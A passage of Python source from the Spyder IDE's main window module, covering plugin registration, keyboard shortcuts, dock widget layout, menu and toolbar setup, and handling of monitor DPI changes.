self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register(omit_conf=omit_conf)
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.shortcuts.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
shortcut = None
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.shortcuts.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
try:
self.widgetlist.remove(plugin)
except ValueError:
pass
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Check if TABIFY is not a list with None as unique value or a default
# list
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugin do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins or to prevent collisions with other
# attributes, i.e layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# Tour
# TODO: Should be a plugin
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# --- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
light_qss = str(APP_STYLESHEET)
self.setStyleSheet(light_qss)
self.statusBar().setStyleSheet(light_qss)
css_path = CSS_PATH
# Set css_path as a configuration to be used by the plugins
CONF.set('appearance', 'css_path', css_path)
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
# Working directory initialization
CONF.set('workingdir', 'init_workdir', self.init_workdir)
# Load and register internal and external plugins
external_plugins = find_external_plugins()
internal_plugins = find_internal_plugins()
all_plugins = external_plugins.copy()
all_plugins.update(internal_plugins.copy())
# Determine 'enable' config for the plugins that have it
enabled_plugins = {}
for plugin in all_plugins.values():
plugin_name = plugin.NAME
plugin_main_attribute_name = (
self._INTERNAL_PLUGINS_MAPPING[plugin_name]
if plugin_name in self._INTERNAL_PLUGINS_MAPPING
else plugin_name)
try:
if CONF.get(plugin_main_attribute_name, "enable"):
enabled_plugins[plugin_name] = plugin
except (cp.NoOptionError, cp.NoSectionError):
enabled_plugins[plugin_name] = plugin
# Get ordered list of plugins classes and instantiate them
plugin_deps = solve_plugin_dependencies(list(enabled_plugins.values()))
for plugin_class in plugin_deps:
plugin_name = plugin_class.NAME
# Non-migrated plugins
if plugin_name in [
Plugins.Editor,
Plugins.IPythonConsole]:
if plugin_name == Plugins.IPythonConsole:
plugin_instance = plugin_class(self)
plugin_instance.sig_exception_occurred.connect(
self.handle_exception)
else:
plugin_instance = plugin_class(self)
plugin_instance.register_plugin()
self.add_plugin(plugin_instance)
self.preferences.register_plugin_preferences(
plugin_instance)
# Migrated or new plugins
elif plugin_name in [
Plugins.MainMenu,
Plugins.OnlineHelp,
Plugins.Toolbar,
Plugins.Preferences,
Plugins.Appearance,
Plugins.Run,
Plugins.Shortcuts,
Plugins.StatusBar,
Plugins.Completions,
Plugins.OutlineExplorer,
Plugins.Console,
Plugins.MainInterpreter,
Plugins.Breakpoints,
Plugins.History,
Plugins.Profiler,
Plugins.Explorer,
Plugins.Help,
Plugins.Plots,
Plugins.VariableExplorer,
Plugins.Application,
Plugins.Find,
Plugins.Pylint,
Plugins.WorkingDirectory,
Plugins.Projects,
Plugins.Layout]:
plugin_instance = plugin_class(self, configuration=CONF)
self.register_plugin(plugin_instance)
# TODO: Check thirdparty attribute usage
# For now append plugins to the thirdparty attribute as was
# being done
if plugin_name in [
Plugins.Breakpoints,
Plugins.Profiler,
Plugins.Pylint]:
self.thirdparty_plugins.append(plugin_instance)
# Load external_plugins adding their dependencies
elif (issubclass(plugin_class, SpyderPluginV2) and
plugin_class.NAME in external_plugins):
try:
if plugin_class.CONF_FILE:
CONF.register_plugin(plugin_class)
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True,
omit_conf=plugin_class.CONF_FILE)
# These attributes come from spyder.app.solver to add
# plugins to the dependencies dialog
if not running_under_pytest():
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(
module, package_name, description, version, None,
kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Loading old third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# Set window title
self.set_window_title()
# Menus
# TODO: Remove when all menus are migrated to use the Main Menu Plugin
logger.info("Creating Menus...")
from spyder.api.widgets.menus import SpyderMenu
from spyder.plugins.mainmenu.api import (
ApplicationMenus, HelpMenuSections, ToolsMenuSections,
FileMenuSections)
mainmenu = self.mainmenu
self.edit_menu = mainmenu.get_application_menu("edit_menu")
self.search_menu = mainmenu.get_application_menu("search_menu")
self.source_menu = mainmenu.get_application_menu("source_menu")
self.source_menu.aboutToShow.connect(self.update_source_menu)
self.run_menu = mainmenu.get_application_menu("run_menu")
self.debug_menu = mainmenu.get_application_menu("debug_menu")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions += [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action,
None] + self.editor.edit_menu_actions
switcher_actions = [
self.file_switcher_action,
self.symbol_finder_action
]
for switcher_action in switcher_actions:
mainmenu.add_item_to_application_menu(
switcher_action,
menu_id=ApplicationMenus.File,
section=FileMenuSections.Switcher,
before_section=FileMenuSections.Restart)
self.set_splash("")
# Toolbars
# TODO: Remove after finishing the migration
logger.info("Creating toolbars...")
toolbar = self.toolbar
self.file_toolbar = toolbar.get_application_toolbar("file_toolbar")
self.run_toolbar = toolbar.get_application_toolbar("run_toolbar")
self.debug_toolbar = toolbar.get_application_toolbar("debug_toolbar")
self.main_toolbar = toolbar.get_application_toolbar("main_toolbar")
# Tools + External Tools (some of this depends on the Application
# plugin)
logger.info("Creating Tools menu...")
spyder_path_action = create_action(
self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
from spyder.plugins.application.plugin import (
ApplicationActions, WinUserEnvDialog)
winenv_action = None
if WinUserEnvDialog:
winenv_action = self.application.get_action(
ApplicationActions.SpyderWindowsEnvVariables)
mainmenu.add_item_to_application_menu(
spyder_path_action,
menu_id=ApplicationMenus.Tools,
section=ToolsMenuSections.Tools,
before=winenv_action
)
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
mainmenu.add_item_to_application_menu(
self.menu_lsp_logs,
menu_id=ApplicationMenus.Tools)
# Main toolbar
from spyder.plugins.toolbar.api import (
ApplicationToolbars, MainToolbarSections)
self.toolbar.add_item_to_application_toolbar(
spyder_path_action,
toolbar_id=ApplicationToolbars.Main,
section=MainToolbarSections.ApplicationSection
)
self.set_splash(_("Setting up main window..."))
#----- Tours
# TODO: Move tours to a plugin structure
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self,
self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
mainmenu.add_item_to_application_menu(
self.tour_action,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.Documentation)
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
def __getattr__(self, attr):
"""
Redefinition of __getattr__ to enable access to plugins.
Loaded plugins can be accessed as attributes of the mainwindow
as before, e.g self.console or self.main.console, preserving the
same accessor as before.
"""
# Mapping of new plugin identifiers vs old attributtes
# names given for plugins
if attr in self._INTERNAL_PLUGINS_MAPPING.keys():
return self.get_plugin(self._INTERNAL_PLUGINS_MAPPING[attr])
try:
return self.get_plugin(attr)
except SpyderAPIError:
pass
return super().__getattr__(attr)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def pre_visible_setup(self):
"""
Actions to be performed before the main window is visible.
The actions here are related with setting up the main window.
"""
logger.info("Setting up window...")
# Create external plugins before loading the layout to include them in
# the window restore state after restarts.
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
self.tabify_plugin(plugin_instance, Plugins.Console)
if isinstance(plugin_instance, SpyderDockablePlugin):
plugin_instance.get_widget().toggle_view(False)
for plugin_id, plugin_instance in self._PLUGINS.items():
try:
plugin_instance.before_mainwindow_visible()
except AttributeError:
pass
if self.splash is not None:
self.splash.hide()
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
# Register custom layouts
for plugin, plugin_instance in self._PLUGINS.items():
if hasattr(plugin_instance, 'CUSTOM_LAYOUTS'):
if isinstance(plugin_instance.CUSTOM_LAYOUTS, list):
for custom_layout in plugin_instance.CUSTOM_LAYOUTS:
self.layouts.register_layout(
self, custom_layout)
else:
logger.info(
'Unable to load custom layouts for {}. '
'Expecting a list of layout classes but got {}'
.format(plugin, plugin_instance.CUSTOM_LAYOUTS)
)
self.layouts.update_layout_menu_actions()
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for __, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Update plugins toggle actions to show the "Switch to" plugin shortcut
self._update_shortcuts_in_panes_menu()
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
# TODO: Remove this reference to projects once we can send the command
# line options to the plugins.
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
screen = self.window().windowHandle().screen()
self.current_dpi = screen.logicalDotsPerInch()
screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, new_screen):
"""Connect DPI signals for new screen."""
if new_screen is not None:
new_screen_dpi = new_screen.logicalDotsPerInch()
if self.current_dpi != new_screen_dpi:
self.show_dpi_change_message(new_screen_dpi)
else:
new_screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def handle_dpi_change_response(self, result, dpi):
"""Handle dpi change message dialog result."""
if self.dpi_change_dismiss_box.isChecked():
self.show_dpi_message = False
self.dpi_change_dismiss_box = None
if result == 0: # Restart button was clicked
# Activate HDPI auto-scaling option since is needed for a
# proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Update current dpi for future checks
self.current_dpi = dpi
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
if not self.show_dpi_message:
return
if self.current_dpi != dpi:
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
self.dpi_change_dismiss_box = QCheckBox(
_("Hide this message during the current session"),
self
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(
_
("A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
